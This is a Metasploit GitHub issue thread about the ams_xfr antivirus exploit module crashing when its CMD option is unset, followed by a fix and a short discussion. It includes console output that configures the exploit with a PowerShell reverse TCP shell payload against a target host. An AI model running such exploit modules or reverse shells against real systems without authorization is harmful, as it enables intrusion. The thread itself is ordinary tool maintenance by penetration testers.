exploit/windows/antivirus/ams_xfr exploit fails when cmd is unset

[digininja]

Steps to reproduce

Unsetting CMD causes an error when running the exploit

msf exploit(ams_xfr) > show options

Module options (exploit/windows/antivirus/ams_xfr):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   CMD    dir              no        Execute this command instead of using command stager
   RHOST  172.1.1.1        yes       The target address
   RPORT  12174            yes       The target port


Payload options (windows/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   EXITFUNC      process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST         172.1.1.2        yes       The listen address
   LOAD_MODULES                   no        A list of powershell modules seperated by a comma to download over the web
   LPORT         4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Universal



msf exploit(ams_xfr) > run

[*] Started reverse SSL handler on 172.1.1.2:4444 
[*] 172.1.1.1:12174 - Sending request to 172.1.1.1:12174
[*] 172.1.1.1:12174 - Got data, execution successful!
[*] 172.1.1.1:12174 - Command Stager progress -  59.09% done (26/44 bytes)
[*] 172.1.1.1:12174 - Got data, execution successful!
[*] 172.1.1.1:12174 - Command Stager progress - 100.00% done (44/44 bytes)
[*] 172.1.1.1:12174 - Attempting to execute the payload...
[-] 172.1.1.1:12174 - Exploit failed: RangeError 73804 out of char range
[*] Exploit completed, but no session was created.

msf exploit(ams_xfr) > unset CMD
Unsetting CMD...
msf exploit(ams_xfr) > run

[*] Started reverse SSL handler on 172.1.1.2:4444 
[-] 172.1.1.1:12174 - Exploit failed: NoMethodError undefined method `empty?' for nil:NilClass
[*] Exploit completed, but no session was created.

This was repeatable

Expected behavior

Shouldn't get the error

Current behavior

Unset seems to change the CMD to nil where before when it wasn't set it was probably an empty string.

System stuff

Metasploit version

3ea2f62376423aefdb1d98a87503ab348b892956 Land #6875, update description for auxiliary/spoof/nbns/nbns_response

I installed Metasploit with:

direct from Git Master

$ ruby -v
ruby 2.3.1p112 (2016-04-26 revision 54768) [x86_64-linux]

OS

Ubuntu

[nixawk]

@digininja It is a bug.

https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/antivirus/ams_xfr.rb#L96

Could you test the pr against your lab ?

[digininja]

That fixed it.

Still not getting a shell but doubt that is your fault :(

[nixawk]

@digininja Could you show us how to setup your lab ?

[digininja]

It isn't a lab, it is on site with a client.

On Wed, 18 May 2016 at 09:51 Security Corporation notifications@github.com
wrote:

@digininja https://github.com/digininja Could you show us how to setup
your lab ?

—
You are receiving this because you were mentioned.
Reply to this email directly or view it on GitHub
#6888 (comment)

[nixawk]

@digininja please upload a pcap to show you exploit details.

[digininja]

I'll have to check with the client. Do you have a private address I can
sent it to if they say yes?

On Wed, 18 May 2016 at 10:02 Security Corporation notifications@github.com
wrote:

please send us a pcap to show you exploit details.

—
You are receiving this because you were mentioned.
Reply to this email directly or view it on GitHub
#6888 (comment)

[wchen-r7]

This issue is considered as resolved because #6889. For the reliability issue, please go ahead and file that as a separate so we can keep track of that specifically instead of being buried in the comments here. And I hope that one is solvable because maybe getting the vuln app again for testing is tricky. Thanks.

[digininja]

I've no longer got access to the app so I'll leave it for now and if I ever find it again I'll see what happens.